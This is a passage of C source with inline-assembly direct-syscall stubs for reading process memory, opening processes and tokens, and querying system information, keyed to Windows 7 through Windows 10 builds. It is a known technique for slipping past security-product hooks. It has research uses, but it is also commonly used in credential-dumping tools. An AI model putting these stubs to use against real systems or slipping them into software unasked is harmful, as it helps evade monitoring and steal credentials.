__asm__("NtReadVirtualMemory: \n\
    mov rax, gs:[0x60] \n\
NtReadVirtualMemory_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtReadVirtualMemory_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtReadVirtualMemory_Check_10_0_XXXX \n\
    jmp NtReadVirtualMemory_SystemCall_Unknown \n\
NtReadVirtualMemory_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtReadVirtualMemory_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtReadVirtualMemory_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtReadVirtualMemory_SystemCall_6_3_XXXX \n\
    jmp NtReadVirtualMemory_SystemCall_Unknown \n\
NtReadVirtualMemory_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtReadVirtualMemory_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtReadVirtualMemory_SystemCall_6_1_7601 \n\
    jmp NtReadVirtualMemory_SystemCall_Unknown \n\
NtReadVirtualMemory_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtReadVirtualMemory_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtReadVirtualMemory_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtReadVirtualMemory_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtReadVirtualMemory_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtReadVirtualMemory_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtReadVirtualMemory_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtReadVirtualMemory_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtReadVirtualMemory_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtReadVirtualMemory_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtReadVirtualMemory_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtReadVirtualMemory_SystemCall_10_0_19042 \n\
    jmp NtReadVirtualMemory_SystemCall_Unknown \n\
NtReadVirtualMemory_SystemCall_6_1_7600: \n\
    mov eax, 0x003c \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_6_1_7601: \n\
    mov eax, 0x003c \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_6_2_XXXX: \n\
    mov eax, 0x003d \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_6_3_XXXX: \n\
    mov eax, 0x003e \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_10240: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_10586: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_14393: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_15063: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_16299: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_17134: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_17763: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_18362: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_18363: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_19041: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_10_0_19042: \n\
    mov eax, 0x003f \n\
    jmp NtReadVirtualMemory_Epilogue \n\
NtReadVirtualMemory_SystemCall_Unknown: \n\
    ret \n\
NtReadVirtualMemory_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/* NtOpenProcessToken: unlike the stubs above, the number differs between most Win10 builds (0x0114 .. 0x0128). */
#define ZwOpenProcessToken NtOpenProcessToken
__asm__("NtOpenProcessToken: \n\
    mov rax, gs:[0x60] \n\
NtOpenProcessToken_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtOpenProcessToken_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtOpenProcessToken_Check_10_0_XXXX \n\
    jmp NtOpenProcessToken_SystemCall_Unknown \n\
NtOpenProcessToken_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtOpenProcessToken_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtOpenProcessToken_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtOpenProcessToken_SystemCall_6_3_XXXX \n\
    jmp NtOpenProcessToken_SystemCall_Unknown \n\
NtOpenProcessToken_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtOpenProcessToken_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtOpenProcessToken_SystemCall_6_1_7601 \n\
    jmp NtOpenProcessToken_SystemCall_Unknown \n\
NtOpenProcessToken_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtOpenProcessToken_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtOpenProcessToken_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtOpenProcessToken_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtOpenProcessToken_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtOpenProcessToken_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtOpenProcessToken_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtOpenProcessToken_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtOpenProcessToken_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtOpenProcessToken_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtOpenProcessToken_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtOpenProcessToken_SystemCall_10_0_19042 \n\
    jmp NtOpenProcessToken_SystemCall_Unknown \n\
NtOpenProcessToken_SystemCall_6_1_7600: \n\
    mov eax, 0x00f9 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_6_1_7601: \n\
    mov eax, 0x00f9 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_6_2_XXXX: \n\
    mov eax, 0x010b \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_6_3_XXXX: \n\
    mov eax, 0x010e \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_10240: \n\
    mov eax, 0x0114 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_10586: \n\
    mov eax, 0x0117 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_14393: \n\
    mov eax, 0x0119 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_15063: \n\
    mov eax, 0x011d \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_16299: \n\
    mov eax, 0x011f \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_17134: \n\
    mov eax, 0x0121 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_17763: \n\
    mov eax, 0x0122 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_18362: \n\
    mov eax, 0x0123 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_18363: \n\
    mov eax, 0x0123 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_19041: \n\
    mov eax, 0x0128 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_10_0_19042: \n\
    mov eax, 0x0128 \n\
    jmp NtOpenProcessToken_Epilogue \n\
NtOpenProcessToken_SystemCall_Unknown: \n\
    ret \n\
NtOpenProcessToken_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/* NtOpenProcess: 0x0023 (6.1), 0x0024 (6.2), 0x0025 (6.3), 0x0026 (all listed Win10 builds). */
#define ZwOpenProcess NtOpenProcess
__asm__("NtOpenProcess: \n\
    mov rax, gs:[0x60] \n\
NtOpenProcess_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtOpenProcess_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtOpenProcess_Check_10_0_XXXX \n\
    jmp NtOpenProcess_SystemCall_Unknown \n\
NtOpenProcess_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtOpenProcess_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtOpenProcess_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtOpenProcess_SystemCall_6_3_XXXX \n\
    jmp NtOpenProcess_SystemCall_Unknown \n\
NtOpenProcess_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtOpenProcess_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtOpenProcess_SystemCall_6_1_7601 \n\
    jmp NtOpenProcess_SystemCall_Unknown \n\
NtOpenProcess_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtOpenProcess_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtOpenProcess_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtOpenProcess_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtOpenProcess_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtOpenProcess_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtOpenProcess_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtOpenProcess_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtOpenProcess_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtOpenProcess_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtOpenProcess_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtOpenProcess_SystemCall_10_0_19042 \n\
    jmp NtOpenProcess_SystemCall_Unknown \n\
NtOpenProcess_SystemCall_6_1_7600: \n\
    mov eax, 0x0023 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_6_1_7601: \n\
    mov eax, 0x0023 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_6_2_XXXX: \n\
    mov eax, 0x0024 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_6_3_XXXX: \n\
    mov eax, 0x0025 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_10240: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_10586: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_14393: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_15063: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_16299: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_17134: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_17763: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_18362: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_18363: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_19041: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_10_0_19042: \n\
    mov eax, 0x0026 \n\
    jmp NtOpenProcess_Epilogue \n\
NtOpenProcess_SystemCall_Unknown: \n\
    ret \n\
NtOpenProcess_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/* NtClose: 0x000c (6.1), 0x000d (6.2), 0x000e (6.3), 0x000f (all listed Win10 builds). */
#define ZwClose NtClose
__asm__("NtClose: \n\
    mov rax, gs:[0x60] \n\
NtClose_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtClose_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtClose_Check_10_0_XXXX \n\
    jmp NtClose_SystemCall_Unknown \n\
NtClose_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtClose_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtClose_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtClose_SystemCall_6_3_XXXX \n\
    jmp NtClose_SystemCall_Unknown \n\
NtClose_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtClose_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtClose_SystemCall_6_1_7601 \n\
    jmp NtClose_SystemCall_Unknown \n\
NtClose_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtClose_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtClose_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtClose_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtClose_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtClose_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtClose_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtClose_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtClose_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtClose_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtClose_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtClose_SystemCall_10_0_19042 \n\
    jmp NtClose_SystemCall_Unknown \n\
NtClose_SystemCall_6_1_7600: \n\
    mov eax, 0x000c \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_6_1_7601: \n\
    mov eax, 0x000c \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_6_2_XXXX: \n\
    mov eax, 0x000d \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_6_3_XXXX: \n\
    mov eax, 0x000e \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_10240: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_10586: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_14393: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_15063: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_16299: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_17134: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_17763: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_18362: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_18363: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_19041: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_10_0_19042: \n\
    mov eax, 0x000f \n\
    jmp NtClose_Epilogue \n\
NtClose_SystemCall_Unknown: \n\
    ret \n\
NtClose_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/* NtQuerySystemInformation: 0x0033 (6.1), 0x0034 (6.2), 0x0035 (6.3), 0x0036 (all listed Win10 builds). */
#define ZwQuerySystemInformation NtQuerySystemInformation
__asm__("NtQuerySystemInformation: \n\
    mov rax, gs:[0x60] \n\
NtQuerySystemInformation_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtQuerySystemInformation_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtQuerySystemInformation_Check_10_0_XXXX \n\
    jmp NtQuerySystemInformation_SystemCall_Unknown \n\
NtQuerySystemInformation_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtQuerySystemInformation_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtQuerySystemInformation_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtQuerySystemInformation_SystemCall_6_3_XXXX \n\
    jmp NtQuerySystemInformation_SystemCall_Unknown \n\
NtQuerySystemInformation_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtQuerySystemInformation_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtQuerySystemInformation_SystemCall_6_1_7601 \n\
    jmp NtQuerySystemInformation_SystemCall_Unknown \n\
NtQuerySystemInformation_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtQuerySystemInformation_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtQuerySystemInformation_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtQuerySystemInformation_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtQuerySystemInformation_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtQuerySystemInformation_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtQuerySystemInformation_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtQuerySystemInformation_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtQuerySystemInformation_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtQuerySystemInformation_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtQuerySystemInformation_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtQuerySystemInformation_SystemCall_10_0_19042 \n\
    jmp NtQuerySystemInformation_SystemCall_Unknown \n\
NtQuerySystemInformation_SystemCall_6_1_7600: \n\
    mov eax, 0x0033 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_6_1_7601: \n\
    mov eax, 0x0033 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_6_2_XXXX: \n\
    mov eax, 0x0034 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_6_3_XXXX: \n\
    mov eax, 0x0035 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_10240: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_10586: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_14393: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_15063: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_16299: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_17134: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_17763: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_18362: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_18363: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_19041: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_10_0_19042: \n\
    mov eax, 0x0036 \n\
    jmp NtQuerySystemInformation_Epilogue \n\
NtQuerySystemInformation_SystemCall_Unknown: \n\
    ret \n\
NtQuerySystemInformation_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");